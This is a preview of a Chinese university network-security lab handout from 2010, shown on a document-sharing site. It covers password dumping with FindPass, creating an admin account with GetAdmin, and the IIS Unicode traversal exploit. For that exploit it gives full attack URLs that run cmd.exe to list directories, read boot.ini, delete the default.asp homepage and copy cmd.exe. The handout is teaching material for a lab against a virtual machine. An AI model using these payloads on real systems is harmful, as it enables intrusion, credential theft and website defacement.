计算机网络安全技术实验四new

计算机网络安全技术实验四new

ID:18350678

大小:808.00 KB

页数:17页

时间:2018-09-16

计算机网络安全技术实验四new_第1页
计算机网络安全技术实验四new_第2页
计算机网络安全技术实验四new_第3页
计算机网络安全技术实验四new_第4页
计算机网络安全技术实验四new_第5页
资源描述:

《计算机网络安全技术实验四new》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、计算机网络安全技术实验四2010/5/10第1、2节课上机内容以下实验在主机里面完成。主机入侵虚拟机(本实验的工具在ftp://219.222.171.9/资源共享/计算机网络安全教程/第五章的相应案例的压缩包里)。声明:本实验内容为研究学习之用,若有人根据本实验之技术和工具做出危害社会之事,一切后果由实施破坏者承担。n案例名称:案例5-1得到管理员密码用户登录以后,所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,如图5-1所示。n使用Fi

2、ndPass等工具可以对该进程进行解码,然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录,执行该程序,将得到当前用户得登录名,如图5-2所示。案例5-2普通用户建立管理员帐号n利用Hacker帐户登录系统,在系统中执行程序GetAdmin.exe,程序自动读取所有用户列表,在对话框中点击按钮“New”,在框中输入要新建的管理员组的用户名,如图5-5所示。n输入一个用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,出现添加成功的窗口,如图5-6所示。案例名称:案

3、例5-07(Unicode漏洞部分为选作)Unicode漏洞的检测n使用扫描工具来检测Unicode漏洞是否存在,使用上一章介绍的X-Scan来对目标系统进行扫描,目标主机IP为:172.18.25.109(换成自己的虚拟机IP地址),Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了,X-Scan设置如图5-17所示。将主机添加到目标地址,扫描结果如图5-18所示。n可以看出,存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如:nn/scripts/..%c0%2f.

4、./winnt/system32/cmd.exe?/c+dirnn其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录,在IIS中的位置如图5-19所示。scripts目录一般系统盘根目录下的Inetpub目录下,如图5-20所示。n在Windows的目录结构中,可以使用两个点和一个斜线“../”来访问上一级目录,在浏览器中利用“scripts/../../”可以访问到系统盘根目录,访问“scripts/../../winnt/system32”就访问到系统的系统目录了,在system3

5、2目录下包含许多重要的系统文件,比如cmd.exe文件,可以利用该文件新建用户,删除文件等操作。浏览器地址栏中禁用符号“../”,但是可以使用符号“/”的Unicode的编码。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。利用Unicode漏洞读取系统盘目录n利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输入n“http://172.18.25.

6、109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:”n利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。使用的语句是:nnhttp://172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type+c:boot.inin执行的结果如图5-22所示。利用Unicode漏洞删除主页n利用Unicode可以方便的更改对方的主页,比如现在已

7、经知道对方网站的根路径在“C:Initpubwwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。nn使用的语句是:nhttp://172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp拷贝文件n了是使用方便,利用语句将cmd.exe文件拷贝到scripts目录,并改名为c.exe,使

8、用的语句是:nhttp://172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exen程序执行结果如图5-24所示。查看C盘的目录n以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:nhttp:/

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。